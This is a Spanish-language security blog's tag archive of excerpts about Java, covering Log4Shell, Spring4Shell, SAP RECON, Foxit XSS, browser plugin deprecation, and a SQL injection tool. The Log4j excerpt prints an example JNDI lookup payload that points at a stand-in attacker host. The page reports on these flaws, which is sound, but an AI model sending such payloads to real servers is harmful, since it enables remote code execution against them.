Entradas Mensuales

Síguenos en:

Canal Oficial Telegram de elhacker.NET Grupo Facebook elhacker.NET Twitter elhacker.NET Canal Youtube elhacker.NET Comunidad Steam: Grupo elhacker.NET Mastodon
Mostrando entradas con la etiqueta java. Mostrar todas las entradas
Mostrando entradas con la etiqueta java. Mostrar todas las entradas

PostHeaderIcon Vulnerabilidades en Foxit PDF Editor permiten a atacantes ejecutar JavaScript arbitrario


Actualizaciones de seguridad abordan vulnerabilidades críticas de cross-site scripting (XSS) en Foxit PDF Editor Cloud que podrían permitir a los atacantes ejecutar código JavaScript arbitrario en los navegadores de los usuarios. Las vulnerabilidades fueron descubiertas en la lista de Archivos Adjuntos y el panel de Capas de la aplicación, donde la validación insuficiente de entradas y la codificación incorrecta de salidas crean vías para la ejecución de código malicioso. 




PostHeaderIcon Python logra un hito histórico en programación que solo había logrado Java hace 24 años


Python ha logrado un hito en programación igualado solo por Java hace 24 años, impulsado por el auge de la inteligencia artificial. Se consolida como el lenguaje más popular, superando a Java y desplazando a C# en 2025 en un cambio histórico del sector.





PostHeaderIcon Python supera Java en popularidad


Python ha superado a Java en popularidad, algo que Java logró hace 24 años, impulsado por la inteligencia artificial y se espera que en 2025 C# quede atrás.

 




PostHeaderIcon MacOS 14.4 causa el caos, los programas se cierran, no funciona Java y se borran archivos de iCloud


Pocos días después de recibir una nueva versión actualizada de macOS Sonoma, los usuarios de máquinas basadas en Apple Silicon están experimentando problemas generalizados con el software y los servicios en la nube, incluyendo applets Java y aplicaciones que ya no se ejecutan correctamente. 





PostHeaderIcon Spring4Shell: un nuevo 0-day en Spring (Java)


 Recientemente, un miembro del grupo KnownSec con nick p1n93r publicó un pantallazo en su cuenta de Twitter que mostraba un RCE explotado trivialmente contra el core de Spring (no confundir con otra en Spring Cloud - CVE-2022-22963), ya sabéis, uno de los frameworks en Java más populares en Internet.




PostHeaderIcon Resumen de todas las vulnerabilidades de Log4j


Las versiones de Log4j anteriores a 2.16.0 están sujetas a una vulnerabilidad de ejecución remota de código a través del analizador ldap JNDI. El resumen de la vulnerabilidad anterior es que un servidor que utilice la librería de java vulnerable, cuando reciba una petición en alguno de los campos que necesitaría tratar (el User-Agent en este caso), parsearía el contenido (${variable} => ${jndi:ldap://evil.xa/x}), entraría log4j para su tratamiento, realizaría la query ldap hacia el destino (evil.xa) y éste le respondería con la clase maliciosa ejecutando el código existente en la misma.

 

 



PostHeaderIcon Vulnerabilidad crítica en Apache Log4j bautizada como Log4Shell afecta incluso a Minecraft


Una vulnerabilidad zero-day recientemente descubierta en la biblioteca de registro de Java Apache Log4j, ampliamente utilizada (iCloud, Steam, incluso expotable en el chat de Minecraft), es muy fácil de explotar y permite a los atacantes obtener el control total de los servidores afectados. La vulnerabilidad, clasificada como CVE-2021-44228, es muy grave ya que permite la ejecución remota de código sin autenticación cuando el usuario que ejecuta la aplicación utiliza la biblioteca de registro de Java. Afecta Apache Struts2, Apache Solr, Apache Druid, Apache Flink.





PostHeaderIcon Grave fallo en SAP NetWeaver permite secuestrar y robar información


El error, CVE-2020-6287 aka RECON, es una falta de autenticación adecuada en NetWeaver. Esto permite a los usuarios no autorizados crear nuevas cuentas de administración a través de HTTP, concediendo a los malhechores un acceso completo: está clasificado 10 de 10 en términos de gravedad. El vulnerable componente de Java se utiliza en gran parte de la línea de productos de SAP, por lo que sería una buena idea comprobar las actualizaciones de cualquier código SAP que se ejecute en su red. Una explotación exitosa de RECON podría dar a un atacante no autenticado acceso completo al sistema SAP afectado. Esto incluye la capacidad de modificar registros financieros, robar información de identificación personal (PII) de empleados, clientes y proveedores, corromper datos, eliminar o modificar registros




PostHeaderIcon jSQL Injection: herramienta automatizada en Java para realizar ataques inyección SQL


jSQL Injection es una aplicación Java para realizar ataques automátizados, es decir la inyección automática en bases de datos SQL. Es gratuita, de código abierto y multiplataforma (Windows, Linux, Mac OS X). Otras herramientas similares son SQLMap o de la desaparecida Havij de ITSecTeam.




PostHeaderIcon La FTC sentencia que Oracle tendrá que advertir de los peligros de Java en su propia web


Oracle lleva tiempo teniendo que ponerse las pilas actualizando sus múltiples productos debido a numerosos fallos de seguridad. Estos fallos son especialmente peligrosos en plataformas tan extendidas como Java, razón por la que no sólo es importante mantenerla actualizada, sino también asegurarse de eliminar las versiones anteriores para no quedar expuestos a sus vulnerabilidades.




PostHeaderIcon Speedtest publica su test de velocidad sin Flash


Por fin puedes usar otro test de velocidad sin Flash.  Speedtest por fin ha publicado su test de velocidad sin Flash, confirmando que pronto podremos decir adiós con la manita a esta infame tecnología.



PostHeaderIcon Actualizaciones de seguridad para Microsoft y Adobe Flash Player


Adobe ha publicado hoy una nueva actualización para sellar los agujeros de seguridad de casi tres docenas en su software Flash Player. Microsoft también lanzó 14 paquetes de parches, incluyendo un gran número de correcciones para los equipos con su nuevo sistema operativo Windows 10. Para no quedarse fuera del martes de parches, el director de seguridad de Oracle arrojó una granada de mano de conversación en la comunidad de investigadores de seguridad, que respondió de la misma y provocó Oracle a dar marcha atrás ....





PostHeaderIcon Cómo activar el Click to Play de Adobe Flash Player en los navegadores


Podemos activar fácilmente el Click-to-play (Click para activar) el conocido plugin de Adobe Flash Player para todos los navegadores. Lo mismo para el resto de plugins potencialmente vulnerables como el de Oracle Java, la máquina Virtual de Java (si es que realmente lo necesitamos). Incluso el nuevo CEO de Facebook (Alex Stamos) aboga por su muerte. Bienvenidos sean los vídeos en HTML5.




PostHeaderIcon ¿Java dejará de funcionar en Google Chrome?


Según la web de Java, el sistema NPAPI quedaría discontinuado con Google Chrome a finales de 2015. Java, Silverlight, entre otros, utilizan la arquitectura NPAPI para cargar su plugin desde el navegador. NPAPI (Netscape Plugin Application Programming Interface) es una arquitectura de plugins utilizada por muchos navegadores.





PostHeaderIcon Java deja atrás la barra de Ask al ser considerada malware por Microsoft pero ahora pedirá instalar el buscador de Yahoo


Java de Oracle, tristemente célebre en el pasado por integrar la barra (toolbar) de Ask como parte de sus proceso de instalación y actualización, ha sido abandonado ahora a favor del motor de búsqueda de Yahoo.




PostHeaderIcon No habrá más actualizaciones de seguridad para Java 7


Los usuarios de Oracle Java 7 no tendrán más actualizaciones de seguridad a partir de abril 2015, a menos que se concluya un acuerdo especial. Esto conlleva el riesgo de un gran número de usuarios de tener  una versión no compatible, a menos que se actualicen a Java 8.




PostHeaderIcon Vulnerabilidad en Wi-Fi Direct de Android permite reiniciar el dispositivo


Investigadores de seguridad de Core Security han decidido publicar una vulnerabilidad en Wi-Fi Direct Android que permite denegación de servicio DoS, ya que después de avisar al equipo de seguridad de Android, han obtenido como respuesta que la vulnerabilidad es de baja gravedad y por ello no tiene previsto fecha para el parche.





PostHeaderIcon Los usuarios de Windows XP no podrán instalar Java 8


Con fecha de 8 de abril de 2014, Microsoft ha discontinuado Windows XP, con lo que ya no es una plataforma soportada. Los usuarios de XP no podrán instalar Java 8. Los usuarios de Windows deben actualizar a Windows Vista o versión posterior para poder instalar Java 8.





PostHeaderIcon Java dejará de estar activo en Mozilla Firefox y Google Chrome


En los últimos tiempos, Java ha sido la puerta de entrada de ataques informáticos a muchas de las grandes empresas del sector, por no hablar de ataques ‘0-day’ en los que se descubrían enormes agujeros de seguridad tras realizarse actualizaciones del Java Runtime Enviroment




PostHeaderIcon Apple y Mozilla dicen (por el momento): "No a Java" (Actualizada, ya hay parche)


Apple y Mozilla han decidido de momento deshabilitar el plugin de Java en los navegadores (en un hecho sin precedentes) para evitar males mayores hasta que se encuentre una solución real al problema de la última grave vulnerabilidad